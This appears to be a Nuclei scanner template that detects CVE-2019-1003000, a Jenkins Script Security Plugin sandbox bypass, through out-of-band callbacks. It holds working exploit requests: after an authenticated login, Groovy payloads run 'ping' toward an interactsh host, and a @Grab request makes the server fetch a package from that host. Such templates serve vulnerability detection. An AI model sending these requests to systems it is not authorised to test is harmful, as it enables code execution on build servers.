id: CVE-2019-1003000 info: name: Jenkins Script Security Plugin <=1.49 - Sandbox Bypass author: sttlr severity: high description: | A sandbox bypass vulnerability exists in the Jenkins Script Security Plugin (versions 1.49 and earlier) within src/main/java/org/jenkinsci/plugins/scriptsecurity/sandbox/groovy/GroovySandbox.java. This flaw allows attackers with permission to submit sandboxed scripts to execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment. impact: | Attackers with permission to submit sandboxed scripts can bypass sandbox protections and execute arbitrary code on the Jenkins master JVM, potentially compromising the entire Jenkins environment and all managed systems. remediation: | Upgrade to Jenkins Script Security Plugin version 1.50 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-1003000 epss-score: 0.98428 epss-percentile: 0.99912 cpe: cpe:2.3:a:jenkins:script_security:*:*:*:*:*:jenkins:*:* reference: - https://jenkins.io/security/advisory/2019-01-08/#SECURITY-1266 - http://www.rapid7.com/db/modules/exploit/multi/http/jenkins_metaprogramming - https://github.com/slowmistio/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins - https://github.com/1NTheKut/CVE-2019-1003000_RCE-DETECTION - https://github.com/purple-WL/Jenkins_CVE-2019-1003000 - https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc metadata: verified: true max-request: 6 vendor: jenkins product: script_security tags: cve,cve2019,jenkins,oast,bypass,sandbox-bypass,authenticated,vkev,vuln variables: username: admin vendor_name: "{{rand_text_alpha(3)}}.{{rand_text_alpha(5)}}" app_name: "{{rand_text_alpha(8)}}" flow: http(1) && http(2) && (http(3) || http(4)) http: - raw: - | GET /login HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "jenkins" internal: true case-insensitive: true - raw: - | POST /j_acegi_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(tolower(body_2), "jenkins", "/logout")' internal: true - raw: - | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-c%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 Host: {{Hostname}} - | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20{{app_name}}{public%20{{app_name}}(){%22ping%20-n%202%20{{interactsh-url}}%22.execute()}} HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers: - type: word part: interactsh_protocol words: - "dns" - raw: - | GET /securityRealm/user/{{to_lower(username)}}/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(%27http%3a%2f%2f{{interactsh-url}}%2f%27)%0a@Grab(%27{{vendor_name}}:{{app_name}}:1%27)%0aimport%20{{app_name}}; HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "/{{replace(vendor_name, '.', '/')}}/{{app_name}}/1/{{app_name}}-1.pom" # digest: 490a0046304402207e6c4868cadc010f9886c3658d32881a4ca2093fc3a5615d64d7affcd07640e102207d5e234baf64039c939dae07a4359206b32aa1e45cddedea1242450e037e94f2:922c64590222798bb761d5b6d8e72950